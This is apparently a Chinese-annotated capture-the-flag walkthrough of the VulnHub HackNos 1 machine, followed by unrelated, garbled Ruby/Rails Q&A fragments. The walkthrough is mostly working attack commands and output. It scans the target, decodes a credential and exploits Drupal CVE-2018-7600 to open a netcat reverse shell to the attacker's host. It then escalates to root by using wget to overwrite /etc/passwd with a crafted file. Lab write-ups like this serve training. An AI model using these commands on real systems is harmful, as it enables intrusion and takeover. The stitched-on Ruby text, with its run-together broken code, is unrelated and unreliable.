(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:8e:0a:96 1 60 PCS Systemtechnik GmbH
192.168.56.253 08:00:27:19:13:da 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253
──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 23:59 EDT
Nmap scan report for bogon (192.168.56.253)
Host is up (0.000098s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a5a517704dbe48adba64c107a05503ea (RSA)
| 256 f2ce421c04b899539542ab8922669edb (ECDSA)
|_ 256 4a7d156583af82a31202211c2349fbe9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:19:13:DA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ curl http://192.168.56.253/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.253 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.253
+ Target Hostname: 192.168.56.253
+ Target Port: 80
+ Start Time: 2023-03-25 00:00:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 59633974a1f12, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-03-25 00:01:36 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ gobuster dir -u http://192.168.56.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.253
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
2023/03/25 00:02:08 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/drupal (Status: 301) [Size: 317] [--> http://192.168.56.253/drupal/]
/alexander.txt (Status: 200) [Size: 393]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1317761 / 1323366 (99.58%)===============================================================
2023/03/25 00:03:14 Finished
===============================================================
目录扫描阶段发现了目录:/drupal以及文件:/alexander.txt
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ curl http://192.168.56.253/alexander.txt | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 393 100 393 0 0 387k 0 --:--:-- --:--:-- --:--:-- 383k
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
++.<
这是brainfuck编码,用在线网站解码得到:
https://www.splitbrain.org/services/ook
james:Hacker@4514
不知道这是ssh的密码还是drupal的密码,分别尝试一下
──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ ssh james@192.168.56.253
The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
ED25519 key fingerprint is SHA256:h0yIfMN4Bukv3RMUspEBXwOXzImXvIPPSc2RZjB3cEM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
james@192.168.56.253's password:
Permission denied, please try again.
james@192.168.56.253's password:
可以成功登录/drupal
从
http://192.168.56.253/drupal/CHANGELOG.txt
知道drupal版本为7.57
https://github.com/pimps/CVE-2018-7600
┌──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]
└─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c ls
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-dCNohd49V58rf0ua7aGYvFK5MXbLR1rN2k0EjcA8Hoo
[*] Triggering exploit to execute: ls
CHANGELOG.txt
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]
└─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/f'
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-mdv12Axro06nJqcBVq8ymjIsu3depWzXQfJAcAR0aMU
[*] Triggering exploit to execute: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/f
──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 33890
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackNos:/var/www/html/drupal$
成功得到了目标主机反弹回来的Shell
www-data@hackNos:/home/james$ ls -alh
ls -alh
total 40K
drwxr-xr-x 3 james james 4.0K Nov 16 2019 .
drwxr-xr-x 3 root root 4.0K Oct 31 2019 ..
-rw------- 1 james james 2.6K Nov 16 2019 .bash_history
-rw-r--r-- 1 james james 220 Oct 31 2019 .bash_logout
-rw-r--r-- 1 james james 3.7K Oct 31 2019 .bashrc
drwx------ 2 james james 4.0K Oct 31 2019 .cache
-rw------- 1 root root 127 Oct 31 2019 .mysql_history
-rw-r--r-- 1 james james 655 Oct 31 2019 .profile
-rw-r--r-- 1 james james 0 Oct 31 2019 .sudo_as_admin_successful
-rw-rw-r-- 1 james james 175 Oct 31 2019 .wget-hsts
-rw-r--r-- 1 root root 357 Nov 16 2019 user.txt
www-data@hackNos:/home/james$ cat user.txt
cat user.txt
_
| |
/ __) ______ _ _ ___ ___ _ __
\__ \|______|| | | |/ __| / _ \| '__|
( / | |_| |\__ \| __/| |
|_| \__,_||___/ \___||_|
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
www-data@hackNos:/home/james$
由于wget有SUID位,根据GTFOBINS网站的步骤进行提权,但是失败:
www-data@hackNos:/tmp$ TF=$(mktemp)
TF=$(mktemp)
www-data@hackNos:/tmp$ chmod +x $TF
chmod +x $TF
www-data@hackNos:/tmp$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
www-data@hackNos:/tmp$ /usr/bin/wget --use-askpass=$TF 0
/usr/bin/wget --use-askpass=$TF 0
/usr/bin/wget: unrecognized option '--use-askpass=/tmp/tmp.3K0o9eZTI0'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
提权的方式就是通过下载目标靶机上的passwd,然后构造一个有root权限的用户加入到构造的passwd文件中,然后使用wget -O将内容重定向输入到/etc/passwd中
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
bob用户是我们要添加的具有root权限的用户
www-data@hackNos:/tmp$ wget http://192.168.56.206:8000/passwd -O /etc/passwd
wget http://192.168.56.206:8000/passwd -O /etc/passwd
--2023-03-25 10:36:39-- http://192.168.56.206:8000/passwd
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1746 (1.7K) [application/octet-stream]
Saving to: '/etc/passwd'
/etc/passwd 100%[===================>] 1.71K --.-KB/s in 0s
2023-03-25 10:36:39 (493 MB/s) - '/etc/passwd' saved [1746/1746]
www-data@hackNos:/tmp$
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您
我有:When/^(?:|I)follow"([^"]*)"(?:within"([^"]*)")?$/do|link,selector|with_scope(selector)doclick_link(link)endend我打电话的地方:Background:GivenIamanexistingadminuserWhenIfollow"CLIENTS"我的HTML是这样的:CLIENTS我一直收到这个错误:.F-.F--U-----U(::)failedsteps(::)nolinkwithtitle,idortext'CLIENTS'found(Capybara::Element